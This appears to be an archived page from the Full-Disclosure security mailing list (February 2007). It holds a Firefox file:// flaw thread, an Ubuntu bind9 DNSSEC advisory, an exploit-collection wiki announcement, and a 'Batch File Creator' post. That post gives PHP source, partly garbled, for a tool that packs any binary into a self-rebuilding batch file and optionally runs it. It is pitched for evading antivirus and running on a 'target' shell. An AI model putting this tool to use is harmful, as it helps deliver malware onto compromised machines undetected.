2006.0/x86_64/samba-winbind-3.0.20-3.2.20060mdk.x86_64.rpm 
 c35b130dac78cd9f892351a670d903a4  
2006.0/SRPMS/samba-3.0.20-3.2.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 49698f756c0e8d91276578a62f4ba093  
2007.0/i586/libsmbclient0-3.0.23d-2.1mdv2007.0.i586.rpm
 e9c2b7a0d7ad877bf4addaee8ddd6636  
2007.0/i586/libsmbclient0-devel-3.0.23d-2.1mdv2007.0.i586.rp

Re: [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread James Matthews 

Do you think it will be patched??

On 2/5/07, Michal Zalewski <[EMAIL PROTECTED]> wrote:


On Mon, 5 Feb 2007, pdp (architect) wrote:

> You may as well use a QuickTime .mov/.qtl or a PDF document to open a
> file:// link . I think it is easier.

Sure. You can probably have a file:// link in Open Office / MS Office
documents as well; but these all rely on external components, and as such,
attacks could be shrugged off as a weakness in these apps (and there's
some truth to this).

Browser authors know better, and they disallow file:// URLs from the
Internet ever since Javascript became so powerful; this case managed to
slip through, so I thought it's a neat example, in conjunction with
deterministic temporary files.

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-418-1] Bind vulnerabilities

2007-02-05 Thread Kees Cook 
=== 
Ubuntu Security Notice USN-418-1  February 05, 2007
bind9 vulnerabilities
CVE-2007-0493, CVE-2007-0494
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libdns20 1:9.3.1-2ubuntu1.2

Ubuntu 6.06 LTS:
  libdns21 1:9.3.2-2ubuntu1.2

Ubuntu 6.10:
  libdns21 1:9.3.2-2ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

A flaw was discovered in Bind's DNSSEC validation code.  Remote 
attackers could send a specially crafted DNS query which would cause the 
Bind server to crash, resulting in a denial of service.  Only servers 
configured to use DNSSEC extensions were vulnerable.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.1-2ubuntu1.2.diff.gz
  Size/MD5:88369 2eefc488d6319c5801f1fbb97ce382d1

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.1-2ubuntu1.2.dsc
  Size/MD5:  796 06cfe2d861a359d6b2de9f3e7929aa65
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.1.orig.tar.gz
  Size/MD5:  4673603 9ff3204eea27184ea0722f37e43fc95d

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.1-2ubuntu1.2_all.deb
  Size/MD5:   173878 dc064def324a0c95769e249f0bf1153b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   108490 1ee7b5d923f59c25ca7a0ef9683971a0

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   307798 af4ff6637401ac30b4dec6a26fa9e751

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   179790 16e404ddb874425c21005104e2d7a83d

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:  1113278 fb2b55544c4560480557a9feb21b9361

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:88650 3081bca3d96805769ab1a9b3d143c89f

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns20_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   546736 40bc77d25fdc4d5013e4a05dcc310e89

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc9_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   186624 d27af5146b5d1ae656a6eb4f8749dbe0

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:89902 41882216e8b847256ef8d18b3a3dcbad

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   105616 c18ad31bc9848116e114e9cab67845c0

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres1_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   107772 1cdd2e3233ae79b5aeae55edf300a009

http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.1-2ubuntu1.2_amd64.deb
  Size/MD5:   215402 24c46c8ba835bd1e4bb293974aaf40e5

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   105310 45d146fb4f8afbc79525c6a63e92d7ae

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   286508 17a739d3bb5e401f76001a0db39f7f03

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   170690 9e771679ec547c860be40cf9493ceb24

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   982258 309b9c887f2d3fc206482c07aa139986

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:88138 08a8194633188b7d2e680c2958cb52f4

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns20_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   473670 9c26fead55b805e125b9cec8f9ee0376

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc9_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:   168782 0ec9792f9670592532f821f21eddf061

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:87474 aa77574c3fd72f9b2e2eb0214f770d10

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.1-2ubuntu1.2_i386.deb
  Size/MD5:99150 0d3fe78cd536e04c529a2e9f120eb7cd

http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres1_9.3.1-2ubuntu1.2_i

Re: [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread Ben Bucksch 
No, we never patch bugs. Where would this lead us? Only commies taking over!

Tracked in bug 369390.

James Matthews wrote:
> Do you think it will be patched??
>
> On 2/5/07, *Michal Zalewski* <[EMAIL PROTECTED] 
> > wrote:
>
> On Mon, 5 Feb 2007, pdp (architect) wrote:
>
> > You may as well use a QuickTime .mov/.qtl or a PDF document to
> open a
> > file:// link . I think it is easier.
>
> Sure. You can probably have a file:// link in Open Office / MS Office
> documents as well; but these all rely on external components, and
> as such,
> attacks could be shrugged off as a weakness in these apps (and there's
> some truth to this).
>
> Browser authors know better, and they disallow file:// URLs from the
> Internet ever since Javascript became so powerful; this case
> managed to
> slip through, so I thought it's a neat example, in conjunction with
> deterministic temporary files.
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> -- 
> http://www.goldwatches.com
> http://www.wazoozle.com
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread James Matthews 

Thats what i was looking for not if you were going to patch it! If they
were!

On 2/5/07, Ben Bucksch <[EMAIL PROTECTED]> wrote:


No, we never patch bugs. Where would this lead us? Only commies taking
over!

Tracked in bug 369390.

James Matthews wrote:
> Do you think it will be patched??
>
> On 2/5/07, *Michal Zalewski* <[EMAIL PROTECTED]
> > wrote:
>
> On Mon, 5 Feb 2007, pdp (architect) wrote:
>
> > You may as well use a QuickTime .mov/.qtl or a PDF document to
> open a
> > file:// link . I think it is easier.
>
> Sure. You can probably have a file:// link in Open Office / MS
Office
> documents as well; but these all rely on external components, and
> as such,
> attacks could be shrugged off as a weakness in these apps (and
there's
> some truth to this).
>
> Browser authors know better, and they disallow file:// URLs from the
> Internet ever since Javascript became so powerful; this case
> managed to
> slip through, so I thought it's a neat example, in conjunction with
> deterministic temporary files.
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> --
> http://www.goldwatches.com
> http://www.wazoozle.com
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Batch File Creator (A batch file that can create a program (exe, bat, mp3, etc..) and execute it without downloading anything)

2007-02-05 Thread SirDarckCat 

*PHP BatchFileCreator (batch program that makes and execute a program)

If you have a shell, and you want to send a file, you need to use FTP to
process it, or to try to compile it there.. anyway, this code, will generate
a batch file that will create the specified file and optionally execute it.

It is usefull to any person that wants to:

1.- Encrypt a file content, or avoid Antivirus detection.
2.- Make a batch file that serves as an installation program.
3.- Create a binary program at an ASCII (plain text) windows shell.

*Steps for making your batch programs:
1.- Send the file to http://sirdarckcat.awardspace.com/BFC.php
2.- Download the batch file that it will create.
3.- Execute it in your target.

The source code of the PHP program is this:

http://sirdarckcat.googlepages.com/bfc
\r\n:rx
\r\nif EXIST shell.x (
echo Loading..
start \"Loading..\" /MIN /WAIT cmd /C debug^shell.x\r\ntype %~nx0|find \"e \"|find /v
\"REM\">>shell.x\r\necho rcx>>shell.x\r\necho
".base_convert(strlen($x),10,16).">>shell.x\r\necho
w".((isset($_REQUEST['binary']))?"0":" ")." >>shell.x\r\necho
q>>shell.x\r\ngoto:EOF\r\n";

$bin=(isset($_REQUEST['binary']))?0:256;

for ($i=$bin;$i65535){
header("Content-Type: text/plain");
header("Content-Disposition: 
attachment;filename=\"BFC".rand(0,5012).".bat\"");
@ob_start('ob_gzhandler'); // This are larger files, so we better
compress them :P
$tn="s".rand(0,100);
$rn=$_FILES['attachment']['name'];
$m=file_get_contents($_FILES['attachment']['tmp_name']);
$xx=strlen($m)/65000;
$z=(isset($_REQUEST['autostart']))?"start \"\" \"$rn\"":"EXIT";
echo "@echo off

REM BatchFileCreator 0.1
REM By SirDarckCat from elhacker.net
REM Visit http://sirdarckcat.googlepages.com/bfc

IF \"%~1\"==\"\" (
echo Loading..
start \"Loading..\" /MIN /WAIT cmd /C \"%~nx0 xD\"^|debug
copy /Y /B $tn.*,\"$rn\"
del $tn.*
$z
) ELSE (\r\n";
for ($j=0;$j<$xx;$j++){
$x=substr($m,$j*65000,65000);
echo "echo n $tn.p$j";
$sl=strlen($x);
for ($i=0;$i<$sl;$i++){
if (!($i%16)){
echo "\r\necho e ".base_convert($i,10,16)." 
";
}
echo 
substr("00".base_convert(ord($x[$i]),10,16),-2)." ";
}

echo "\r\necho rcx\r\n";
echo "echo ".base_convert(strlen($x),10,16)."\r\n";
echo "echo w 0\r\n";
}
echo "echo q\r\n";
echo ")";
}else{
?>


BatchFileCreator 0.1 by sirdarckcat



BatchFileCreator 0.1
by sirdarckcat
elhacker.net


With this program you can create a batch file that when is 
executed,
will generate
and (optionally) execute a binary file.

Select the file you want to upload, then submit. With a very 
large file your
computer may be unable to process it. (MaxSize: 2 MegaBytes)


 - Autostart when is 
created?
 - Binary?
File:  








Hope its usefull :)

Greetz!!
--
Att.
[EMAIL PROTECTED]

http://www.google.com/search?q=sirdarckcat
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Every MS Exploit

2007-02-05 Thread layne 
Project to find exploits for every MS Security Bulletin gets wiki’ed

Last September (part 1) http://ElseNot.com contributed it’s collocation and 
goal (try to find an exploit for every MS Security Bulletin ever released). 
Activity stopped when Microsoft published 473 bulletins and 163 Exploits had 
been found. 

Now part 2 of www.ElseNot.com is raising the bar and going wiki. Instead of 
just trying to get "a exploit", it is trying to get "every exploit". Now you 
don't have to rely on one person updating it. Do it your self, create a time 
line of exploit releases, document techniques and add other OS'es. This is the 
place to consolidate all the vulnerability information floating around the net, 
your head and mailing lists.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/